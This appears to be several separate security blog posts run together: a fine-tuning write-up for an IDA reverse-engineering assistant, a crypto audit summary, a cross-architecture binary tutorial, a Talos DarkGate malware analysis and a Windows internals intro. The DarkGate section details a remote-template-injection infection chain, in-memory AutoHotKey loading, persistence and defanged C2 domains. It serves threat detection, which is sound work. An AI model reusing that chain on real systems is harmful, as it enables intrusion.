{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this I take the first 10 entries from the training dataset and use the instruction and input values to generate a new output, as well as generating a new output using an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches perfectly - the somewhat surprising result is that function comment is better at 50 steps compared to 100 steps.

Zooming out a bit and comparing further steps, the format is perfect while the most common error seen is confusion on what gets returned (value vs allocated memory) or inconsistent numeric format (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, failing into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old, what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we tried our best with our small model, we can move on and just use GPT4, just not in the way you would expect. Going back and considering the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, while so far we have used our small 7b parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replace our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, its straight forward to use the API and execute the same original instruction generation we previously had done:

I originally had no expectations related to the cost of this process, to be safe I added 50$ to my account before executing the previous step, I was surprised when it only cost ~16$ at the time:

Seeing that it only cost 16$ for the initial run and the quality of the responses were good, I figured why not use both sets of data and get 2x the high-quality instruction datasets?

With the brand-new high-quality dataset complete we can back up and start a new fine tune of our mistral-7b model, in this case it has been trained for 200 steps taking snapshots every 50 steps. After training is complete, an evaluation was done against a new input that is not in either dataset against our old 'low-quality' fine tune and our new one.

At 50 steps the new GPT4 trained version has already performed much better at capturing variables to rename, interestingly the LLM trained dataset description contains more direct references to the code while the GPT4 description is slightly higher level:

At 100 steps the variable names for the GPT4 trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM trained model has picked up the extra variable renames, but they look to be in line with what the GPT4 trained model had at 50 steps. I also thought it was interesting that the LLM trained model refers to [2] as the third field (mathematically correct):

At 150 steps the GPT4 trained model has slightly improved the function description while maintaining the variable renames. The LLM trained model has improved the function name to match the GPT4 trained model at 50 steps, while losing variable renames - interestingly it now refers to [2] as the second element now:

Finally, at 200 steps the GPT4 trained model has slightly tweaked its description. The LLM trained model has rediscovered its variable renames from the 100 steps version and also refined how it references the [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly......

That response looks like something we have seen already, at this point I would say we have proven it is feasible to fine tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

I decided to write my own simple version, apologies in advance for any errors or poor design decisions, the underlying fine-tuned model is available to use with whatever you like best. Building off the previous simple python script shown earlier, I again choose to use Ollama's rest service instead of loading the model directly - I like this design for few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying IDA up with a large memory footprint, that one you have had running for weeks now :)

To set up Ollama to use the new model, download the weights and Modelfile in the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model, if you have other models loaded within your Ollama service they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and return a dialog when it is complete:

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is whenever the plugin is activated, it will identify any references within the code that is being analyzed and retrieve any comments that exist at the target locations and include them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:

For this example, the WDT_ICR register location is queried for any comments, if one exists it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and is part of the 'base knowledge' stored within the original trained weights and would have be identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that considers the additional knowledge that was provided by the IDB:

Currently, this functionality does not extract this information from comments that may be defined at the start of a function; while that would be useful and give context to the current analysis as to what a called function does, this would often result the inclusion of a large number of extra tokens potentially exhausting the underlying models context window and return low quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune a LLM for local usage; whether that is making a better version of the one we are sharing or something completely different. It is also worth noting most of this project was executed earlier this year (feb/march), since then a handful of new models have been released that would be interesting to explore/adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Public Report – Keyfork Implementation Review

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low impact findings were uncovered, each of which were promptly addressed by Distrust.

Cross-Execute Your Linux Binaries, Don’t Cross-Compile Them

Lolbins? Where we’re going, we don’t need lolbins.

At NCC Group, as a consultant in our hardware and embedded systems practice1, I often get to play with various devices, which is always fun, but getting your own software to run on them can be a bit of a pain.
This article documents a few realisations and tricks that make my life easier. There is nothing new about anything mentioned here, but there is also hardly anything written about these (ab)use cases.

The challenges we are looking to solve are:

  • Running standard Linux tools on your embedded device
  • Compiling your own tools to run on the embedded device
  • Running binaries from the embedded device on your PC

This can often be achieved by cross-compiling and/or statically compiling the target binary. It is very much a valid approach, but it can also be time-consuming, even when you’re seasoned at this sort of thing. So, the approach described here does not do that.

Taking the dependency libraries with you

The realisation is that while dynamically linked binaries need some of the environment, it is actually not that hard to figure out what that environment is and to copy it over to the system where you want to run the binary.

Consider the example of running strace from an arm64 Raspberry Pi on an arm64 Android phone.

Just copying won’t work, since Android differs too much from common Linux distributions:

pi@rpi:~ $ adb push `which strace` /data/local/tmp
/usr/bin/strace: 1 file pushed, 0 skipped. 16.0 MB/s (1640712 bytes in 0.098s)
pi@rpi:~ $ adb exec-out /data/local/tmp/strace -ttewrite /bin/echo X
/system/bin/sh: /data/local/tmp/strace: No such file or directory
pi@rpi:~ $ adb exec-out ldd /data/local/tmp/strace 
    linux-vdso.so.1 => [vdso] (0x73edb38000)
CANNOT LINK EXECUTABLE "linker64": library "libc.so.6" not found: needed by main executable

We can list the dependencies. strace depends on the dynamic linker, libraries and often on some special bits like VDSO.

pi@rpi:~ $ ldd `which strace`
    linux-vdso.so.1 (0x0000007faf464000)
    libc.so.6 => /lib/aarch64-linux-gnu/libc.so.6 (0x0000007faf0b0000)
    /lib/ld-linux-aarch64.so.1 (0x0000007faf427000)

We can copy the dependencies and use the appropriate dynamic linker to load them (the first highlighted bit enumerates the dependencies):

pi@rpi:~ $ bin=`which strace`; adb push $bin $(ldd $bin | sed -nre 's/^[^/]*(\/.*) \(0x.*\)$/\1/p') /data/local/tmp/
/usr/bin/strace: 1 file pushed, 0 skipped. 19.4 MB/s (1640712 bytes in 0.081s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 23.7 MB/s (1651472 bytes in 0.067s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 18.6 MB/s (202904 bytes in 0.010s)
3 files pushed, 0 skipped. 19.0 MB/s (3495088 bytes in 0.176s)
pi@rpi:~ $ adb exec-out /data/local/tmp/ld-linux-aarch64.so.1 --library-path /data/local/tmp/ /data/local/tmp/strace -ttewrite /bin/echo X
10:36:27.842717 write(1, "X\n", 2X
)      = 2
10:36:27.845895 +++ exited with 0 +++

There, perfect, we have strace on our device now, and it only took two ugly one-liners.

Installing that odd architecture on your PC

My preferred way of setting up a cross architecture Linux chroot is using debootstrap and schroot. This assumes you are using a distribution from a Debian family (I do see there’s debootstrap for Fedora as well, haven’t tried it though).

Logan Chien posted this nice and short guide2, which basically boils down to following three sections:

Setting up the tools

kali@kali:~$ apt install debootstrap qemu-user-static schroot

Installing a base system

kali@kali:~$ sudo debootstrap --arch=arm64 bookworm ~/chroots/arm64-test
...
I: Base system installed successfully.

This takes a minute or two and installs a base Debian Bookworm system for arm64. The distribution names come from Debian (http://ftp.debian.org/debian/dists/) or Ubuntu (http://archive.ubuntu.com/ubuntu/dists/). For the architecture names navigate into subfolders (for example http://ftp.debian.org/debian/dists/bookworm/main/). If you need a less common architecture try the testing channel, which supports riscv64 for example.

Setting up schroot

kali@kali:~$ echo "[arm64-test] 
directory=$HOME/chroots/arm64-test
users=$(whoami)
root-users=$(whoami)
type=directory" | sudo tee /etc/schroot/chroot.d/arm64-test

Now you can enter the chroot:

kali@kali:~$ schroot -c arm64-test
(arm64-test)kali@kali:~$ uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) aarch64 GNU/Linux
(arm64-test)kali@kali:~$ logout
kali@kali:~$ schroot -c arm64-test -u root
(arm64-test)root@kali:/home/kali# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),119(wireshark),142(kaboxer)

Finish

So, here you have it. Install the wanted binary, and copy it to your target device like we did before from Raspberry Pi.

(arm64-test)kali@kali:~$ # sudo apt install strace adb
...
(arm64-test)kali@kali:~$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
(arm64-test)kali@kali:~$ for i in $(bindeps `which strace`); do adb push $i /data/local/tmp/; done
/usr/bin/strace: 1 file pushed, 0 skipped. 13.3 MB/s (1640712 bytes in 0.117s)
/lib/aarch64-linux-gnu/libc.so.6: 1 file pushed, 0 skipped. 14.0 MB/s (1651472 bytes in 0.113s)
/lib/ld-linux-aarch64.so.1: 1 file pushed, 0 skipped. 7.4 MB/s (202904 bytes in 0.026s)
(arm64-test)kali@kali:~$ adb shell
sargo:/ $ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
sargo:/ $ xrun strace -tte write /bin/echo X
16:31:59.159266 write(1, "X\n", 2X ) = 2 16:31:59.163322 +++ exited with 0 +++

Cross-compiling without cross-compiling

Well, now you have a full Linux distribution of your chosen architecture running, so you can just compile any special tools. Sure, it is emulated through QEMU under the hood, but for anything smallish one does not even notice the performance hit.

And you have avoided dealing with a toolchain to cross-compile for that one-off task.

Running the device’s binaries on your PC

In the above examples the binary we wished to run was copied onto the target device. Occasionally, one wants to do the reverse, run the binary from the device locally on your PC.

The exact same approach should work, and for anything non-trivial I would recommend a custom setup chroot, so you can easily place the required files in the correct locations (and it is also easy to later delete it all).

For a simple tool though, one can get away by using QEMU:

kali@kali:~/android_test$ adb exec-out 'bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }; bindeps `which dexdump`' | xargs -n1 adb pull
/apex/com.android.art/bin/dexdump: 1 file pulled, 0 skipped. 11.6 MB/s (108744 bytes in 0.009s)
/apex/com.android.art/lib64/libdexfile.so: 1 file pulled, 0 skipped. 4.7 MB/s (347040 bytes in 0.070s)
/apex/com.android.art/lib64/libartpalette.so: 1 file pulled, 0 skipped. 2.0 MB/s (14896 bytes in 0.007s)
/apex/com.android.art/lib64/libbase.so: 1 file pulled, 0 skipped. 13.3 MB/s (251152 bytes in 0.018s)
/apex/com.android.art/lib64/libartbase.so: 1 file pulled, 0 skipped. 20.8 MB/s (497272 bytes in 0.023s)
/apex/com.android.art/lib64/libc++.so: 1 file pulled, 0 skipped. 8.1 MB/s (671496 bytes in 0.079s)
/apex/com.android.art/lib64/libziparchive.so: 1 file pulled, 0 skipped. 1.2 MB/s (79752 bytes in 0.066s)
/apex/com.android.runtime/lib64/bionic/libc.so: 1 file pulled, 0 skipped. 26.1 MB/s (1013048 bytes in 0.037s)
/apex/com.android.runtime/lib64/bionic/libdl.so: 1 file pulled, 0 skipped. 2.0 MB/s (13728 bytes in 0.006s)
/apex/com.android.runtime/lib64/bionic/libm.so: 1 file pulled, 0 skipped. 12.7 MB/s (221072 bytes in 0.017s)
/system/lib64/libz.so: 1 file pulled, 0 skipped. 6.5 MB/s (98016 bytes in 0.014s)
/system/lib64/liblog.so: 1 file pulled, 0 skipped. 5.8 MB/s (62176 bytes in 0.010s)
/system/lib64/libc++.so: 1 file pulled, 0 skipped. 25.7 MB/s (700400 bytes in 0.026s)
kali@kali:~/android_test$ adb pull /system/bin/linker64
/system/bin/linker64: 1 file pulled, 0 skipped. 13.1 MB/s (1802728 bytes in 0.131s)
kali@kali:~/android_test$ qemu-arm64 -E LD_LIBRARY_PATH=$PWD ./linker64 $PWD/dexdump
linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
WARNING: linker: Warning: failed to find generated linker configuration from "/linkerconfig/ld.config.txt"
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:126] No file specified
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] Copyright (C) 2007 The Android Open Source Project
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:41] 
dexdump E 05-02 13:14:39 1728592 1728592 dexdump_main.cc:42] dexdump: [-a] [-c] [-d] [-e] [-f] [-h] [-i] [-j] [-l layout] [-n]  [-o outfile] dexfile...
...

With the dynamic linker, dependency libraries and the target binary, we can use qemu-user to run our binary.

The observant reader will notice this differs slightly from the way ld was invoked before. It appears Android’s dynamic linker doesn’t support an argument to specify library path, so we have used LD_LIBRARY_PATH (in the first example above, we could have invoked strace this way as well: LD_LIBRRAY_PATH=/data/local/tmp /data/local/tmp/ld-linux-aarch64.so.1 /data/local/tmp/strace).

Epilogue

I hope you found this useful.

Helper functions

The list of dependencies that are to be copied along with the binary can be generated with:

$ bindeps() { echo "$1" $(ldd "$1" | sed -nre "s/^[^/]*(\/.*) \(0x.*\)$/\1/p"); }
$ bindeps `which strace`

The binary can then be run on the target device with (Note the path will need adjusting and possibly linker arguments as well):

$ xrun() { k=/data/local/tmp; bin=$1; shift; $k/ld* --library-path $k $k/$bin "$@"; }
$ xrun strace -tte write /bin/echo X

DarkGate switches up its tactics with new payload, email templates

DarkGate switches up its tactics with new payload, email templates

This post was authored by Kalpesh Mantri. 

  • Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infected the victim's system with the DarkGate malware. 
  • These campaigns, active since the second week of March, leverage tactics, techniques, and procedures (TTPs) that we have not previously observed in DarkGate attacks. 
  • These campaigns rely on a technique called “Remote Template Injection” to bypass email security controls and to deceive the user into downloading and executing malicious code when the Excel document is opened.  
  • DarkGate has used AutoIT scripts as part of the infection process for a long time. However, in these campaigns, AutoHotKey scripting was used instead of AutoIT.  
  • The final DarkGate payload is designed to execute in-memory, without ever being written to disk, running directly from within the AutoHotKey.exe process. 

The DarkGate malware family is distinguished by its covert spreading techniques, ability to steal information, evasion strategies, and widespread impact on both individuals and organizations. Recently, DarkGate has been observed distributing malware through Microsoft Teams and even via malvertising campaigns. Notably, in the latest campaign, AutoHotKey scripting was employed instead of AutoIT, indicating the continuous evolution of DarkGate actors in altering the infection chain to evade detection. 

Email campaigns 

This research began when a considerable number of our clients reported receiving emails, each containing a Microsoft Excel file attachment that followed a distinct pattern in its naming convention. 

DarkGate switches up its tactics with new payload, email templates

Talos’ intent analysis of these emails revealed that the primary purpose of the emails primarily pertained to financial or official matters, compelling the recipient to take an action by opening the attached document. 

This peculiar trend prompted us to conduct an in-depth investigation into this widespread malspam activity. Our initial findings linked the indicators of compromise (IOCs) to the DarkGate malware.  

The table below includes some of the observed changes in attachment naming convention patterns over time.  

Start Date 

End Date 

Format 

Examples 

March 12, 2024 

March 19, 2024 

march-D%-2024.xlsx 

march-D5676-2024.xlsx 

march-D3230-2024.xlsx 

march-D2091-2024.xlsx 

March 15, 2024 

March 20, 2024 

ACH-%March.xlsx 

ACH-5101-15March.xlsx 

ACH-5392-15March.xlsx 

ACH-4619-15March.xlsx 

March 18, 2024 

March 19, 2024 

attach#%-2024.xlsx 

attach#4919-18-03-2024.xlsx 

attach#8517-18-03-2024.xlsx 

attach#4339-18-03-2024.xlsx 

March 19, 2024 

March 20, 2024 

march19-D%-2024.xlsx 

march19-D3175-2024.xlsx 

march19-D5648-2024.xlsx 

march19-D8858-2024.xlsx 

March 26, 2024 

March 26, 2024 

re-march-26-2024-%.xls? 

re-march-26-2024-4187.xlsx 

re-march-26-2024-7964.xlsx 

re-march-26-2024-4187.xls 

April 3, 2024 

April 5, 2024 

april2024-%.xlsx 

april2024-2032.xlsx 

april2024-3378.xlsx 

april2024-4268.xlsx 

April 9, 2024 

April 9, 2024 

statapril2024-%.xlsx 

statapril2024-9505.xlsx 

statapril2024-9518.xlsx 

statapril2024-9524.xlsx 

April 10, 2024 

April 10, 2024 

4_10_AC-%.xlsx* 

4_10_AC-1177.xlsx 

4_10_AC-1288.xlsx 

4_10_AC-1301.xlsx 

*Variant redirecting to JavaScript file instead of VBS. 

Victimology 

Based on Cisco Talos telemetry, this campaign targets the U.S. the most often compared to other geographic regions.

DarkGate switches up its tactics with new payload, email templates

Healthcare technologies and telecommunications were the most-targeted sectors, but campaign activity was observed targeting a wide range of industries. 

DarkGate switches up its tactics with new payload, email templates

Technical analysis 

Our telemetry indicates that malspam emails were the primary source of delivery for this campaign. It is an active campaign using attached Excel documents attempting to lure users to download and execute remote payloads.  

As shown below, the Excel spreadsheet has an embedded object with an external link to an attacker-controlled Server Message Block (SMB) file share. 

DarkGate switches up its tactics with new payload, email templates

The overall infection process associated with this campaign is shown below. 

DarkGate switches up its tactics with new payload, email templates

The infection process begins when the malicious Excel document is opened. These files were specially crafted to utilize a technique, called “Remote Template Injection,” to trigger the automatic download and execution of malicious contents hosted on a remote server. 

Remote Template Injection is an attack technique that exploits a legitimate Excel functionality wherein templates can be imported from external sources to expand a document’s functions and features. By exploiting the inherent trust users place in document files, this method skilfully evades security protocols that may not be as stringent for document templates compared to executable files. It represents a refined tactic for attackers to establish a presence within a system, sidestepping the need for conventional executable malware.  

When the Excel file is opened, it downloads and executes a VBS file from an attacker-controlled server. 

The VBS file is appended with a command that executes a PowerShell script from the DarkGate command and control (C2) server. 

DarkGate switches up its tactics with new payload, email templates

This PowerShell script retrieves the next stage’s components and executes them, as shown below. 

DarkGate switches up its tactics with new payload, email templates

Payload analysis 

On March 12, 2024, the DarkGate campaign transitioned from deploying AutoIT scripts to employing AutoHotKey scripts. 

AutoIT and AutoHotKey are scripting languages designed for automating tasks on Windows. While both languages serve similar purposes, their differences lie in their syntax complexity, feature sets and community resources. AutoHotKey offers more advanced text manipulation features, extensive support for hotkeys, and a vast library of user-contributed scripts for various purposes. While both AutoIT and AutoHotKey have legitimate purposes, they are often abused by adversaries to run malicious scripts, consistent with other scripting languages often observed in infection chains. 

As shown in the screenshot above, one of the files retrieved is ‘test.txt.’ Within this file, there is base64-encoded blob that, when decoded, transforms into binary data. This binary data is then processed to execute the DarkGate malware payload directly within memory on infected systems. 

DarkGate switches up its tactics with new payload, email templates

As shown in the previous PowerShell code, payloads are initially saved to disk within a directory (C:\rimz\) on the system. The directory name changes across infection chains that were analyzed. 

DarkGate switches up its tactics with new payload, email templates

In this case, the attacker was using a legitimate copy of the AutoHotKey binary (AutoHotKey.exe) to execute a malicious AHK script (script.ahk). 

DarkGate switches up its tactics with new payload, email templates

The executed AHK script reads content from the text file (test.txt), decodes it in memory, and executes it without ever saving the decoded DarkGate payload to disk. This file also contains shellcode that is loaded and executed by the AHK script, as shown below. 

DarkGate switches up its tactics with new payload, email templates

Persistence mechanisms 

Components used during the final stage of the infection process are stored at the following directory location: 

  • C:\ProgramData\cccddcb\AutoHotKey.exe 
  • C:\ProgramData\cccddcb\hafbccc.ahk 
  • C:\ProgramData\cccddcb\test.txt 

Persistence across reboots is established through the creation of a shortcut file within the Startup directory on the infected system. 

Shortcut Parameter 

Value 

Shortcut Location 

C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DfAchhd.lnk 

Shortcut Execution 

C:\ProgramData\cccddcb\AutoHotkey.exe  C:\ProgramData\cccddcb"C:\ProgramData\cccddcb\hafbccc.ahk 

Talos’ threat intelligence and detection response teams have successfully developed detection for these campaigns and blocked them as appropriate on Cisco Secure products. However, because of the evolving nature of recent DarkGate campaigns — as demonstrated by the shift from AutoIT to AutoHotKey scripts and use of remote template injection — serves as a stark reminder of the continuous arms race in cybersecurity. 

Coverage 

 Ways our customers can detect and block this threat are listed below.  

DarkGate switches up its tactics with new payload, email templates

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The following Snort SIDs apply to this threat:  

  • Snort 2 SIDs: 3, 12, 11192, 13667, 15306, 16642, 19187, 23256, 23861, 44484, 44485, 44486, 44487, 44488, 63521, 63522, 63523, 63524 
  • Snort 3 SIDs: 1, 16, 260, 11192, 15306, 36376, 44484, 44486, 44488, 63521, 63522, 63523, 63524 

The following ClamAV detections are also available for this threat:  

  • Doc.Malware.DarkGateDoc 
  • Ps1.Malware.DarkGate-10030456-0 
  • Vbs.Malware.DarkGate-10030520-0 

Indicators of Compromise (IOCs) 

Indicators of Compromise (IOCs) associated with this threat can be found here.  

Below is an example of the configuration parameters extracted from one of the DarkGate payloads analyzed.  

Configuration Parameter 

Value 

C2 

hxxp://badbutperfect[.]com 

hxxp://withupdate[.]com 

hxxp://irreceiver[.]com 

hxxp://backupitfirst[.]com 

hxxp://goingupdate[.]com 

hxxp://buassinnndm[.]net 

Family 

DarkGate 

Attributes 

anti_analysis = true 

anti_debug = false 

anti_vm = true 

c2_port = 80 

internal_mutex (Provides the XOR key/maker used for DarkGate payload decryption) = WZqqpfdY 

ping_interval = 60 

startup_persistence = true 

username = admin 

Windows Internals: Dissecting Secure Image Objects - Part 1

Introduction

Recently I have been working on an un-published (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively-unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I maybe could just start with Secure Image objects!

